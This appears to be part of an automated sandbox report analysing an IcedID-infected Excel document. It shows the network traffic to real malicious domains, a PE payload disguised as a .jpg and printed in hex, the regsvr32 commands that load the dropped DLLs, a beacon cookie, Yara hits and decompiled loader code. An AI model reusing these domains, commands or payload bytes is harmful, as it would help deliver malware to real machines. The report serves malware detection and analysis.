                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.159929037 CEST8.8.8.8192.168.2.220x6848No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.260128975 CEST8.8.8.8192.168.2.220x26aeNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.260128975 CEST8.8.8.8192.168.2.220x26aeNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)

                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                • thousandsyears.download
                                                                                                                                                                                                                                • voopeople.fun
                                                                                                                                                                                                                                • uppercilio.fun
                                                                                                                                                                                                                                • astrocycle.download

                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                0192.168.2.2249167172.67.198.5180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.024257898 CEST0OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                Host: thousandsyears.download
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.076168060 CEST1INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 15:02:22 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                Age: 3951
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=X1YFOhsI9n7GWXlJ02lzXREE47WwqUs%2FEJigtm6a2EmmocA%2FA9G2SS79lLQgFkP2nH1zXviNXTW4ttMMEI7us%2F9DSsd6KYDbe6KKrj2q3kKKUwI1jBEMRAZnzlQTBKz51jLe9%2B0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 66a9b6b3dc2b4e3d-FRA
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                                                                Data Ascii: 14
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.076194048 CEST1INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                1192.168.2.2249168172.67.194.11780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.208049059 CEST2OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                Host: voopeople.fun
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.280752897 CEST3INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 15:02:22 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 57856
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                Age: 3950
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2tFpU8aAbVHKc8qaWG5vA44M%2FvQQDR%2FHMrJKYE2U8pvpTAJBVZB1EwE1r%2BdCJ9kIPXR9eZUJcp4sTKGEmTFWIbmcSnYHw3hmyr%2B4FkYtjbFf%2B2GBpgB79iIn9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 66a9b6b50e8b2c22-FRA
                                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.280826092 CEST5INData Raw: 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: @@
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.280878067 CEST6INData Raw: 00 c7 84 24 a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20
                                                                                                                                                                                                                                Data Ascii: $#ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.280934095 CEST8INData Raw: 8b 8c 24 a8 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24
                                                                                                                                                                                                                                Data Ascii: $HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$h
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.281004906 CEST9INData Raw: 00 89 84 24 f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00
                                                                                                                                                                                                                                Data Ascii: $D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.281049013 CEST10INData Raw: 48 8b b4 24 a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24
                                                                                                                                                                                                                                Data Ascii: H$H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.281089067 CEST12INData Raw: 00 00 4c 8b 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47
                                                                                                                                                                                                                                Data Ascii: L$AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLH
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.281120062 CEST13INData Raw: 84 24 44 01 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48
                                                                                                                                                                                                                                Data Ascii: $DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.281160116 CEST15INData Raw: 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10
                                                                                                                                                                                                                                Data Ascii: PH$pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.281208038 CEST16INData Raw: 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48
                                                                                                                                                                                                                                Data Ascii: DHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.281810999 CEST18INData Raw: 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48
                                                                                                                                                                                                                                Data Ascii: $H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                2192.168.2.2249169172.67.146.8880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.447182894 CEST65OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                Host: uppercilio.fun
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.579262018 CEST66INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 15:02:22 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                Age: 3950
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zPrLaRFWCe%2FVw6Uhi9sg5%2FGjaYrSaqdrM%2FOtgQ3239%2Fs47JD0%2B9tCMX8ZmQEvu37t5sFQlzbzOaP0%2B51gCvVAfMrti8AAWYfC1EUCZlvpi8At7lfKHJpIRy7hrE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 66a9b6b6ab5f16ea-FRA
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                                                                Data Ascii: 14
                                                                                                                                                                                                                                Jul 6, 2021 17:02:22.579315901 CEST66INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                3192.168.2.2249171172.67.213.11580C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.300074100 CEST325OUTGET / HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Cookie: __gads=3565085024:1:7007:51; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=343732383437:416C627573:32323430323331394544383343383535; __io=0; _gid=67AFEDC5AC03
                                                                                                                                                                                                                                Host: astrocycle.download
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.828568935 CEST326INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 15:02:25 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=d3szPdyTRg6bzD7Bq5SxAVq2%2FmuLykBb6CLjyhuLYziN788WdmOD6V%2BCF4ofbolE28MKKdSEx2vLiJFErQQl8xkCs1l6sttDcKgOkPu97qCFks8YeLBPfnXv54E%2BO4UxsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 66a9b6c84ca94a61-FRA
                                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                                                Jul 6, 2021 17:02:25.828596115 CEST326INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                HTTPS Packets

                                                                                                                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                                Jul 6, 2021 17:02:23.707760096 CEST13.224.92.73443192.168.2.2249170CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                                                CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                                                CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                                                CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                Analysis Process: EXCEL.EXE PID: 2556 Parent PID: 584

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Start time:17:02:39
                                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                                Imagebase:0x13ff40000
                                                                                                                                                                                                                                File size:27641504 bytes
                                                                                                                                                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                Chronological Activities

                                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 532 Parent PID: 2556

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Start time:17:02:41
                                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                                                                Imagebase:0xff7d0000
                                                                                                                                                                                                                                File size:19456 bytes
                                                                                                                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                Chronological Activities

                                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 2904 Parent PID: 2556

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Start time:17:02:41
                                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                                                                Imagebase:0xff7d0000
                                                                                                                                                                                                                                File size:19456 bytes
                                                                                                                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2096122245.00000000000A0000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                Chronological Activities

                                                                                                                                                                                                                                Analysis Process: regsvr32.exe PID: 2420 Parent PID: 2556

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Start time:17:02:45
                                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                                                Imagebase:0xff7d0000
                                                                                                                                                                                                                                File size:19456 bytes
                                                                                                                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                Chronological Activities

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                Code Analysis

                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                  Analysis Process: regsvr32.exe PID: 2904 Parent PID: 2556 regsvr32.exeCOMMON

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 020027BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                                                                                                  			E020027BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E02002990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x20070c4, _t77, _t78);
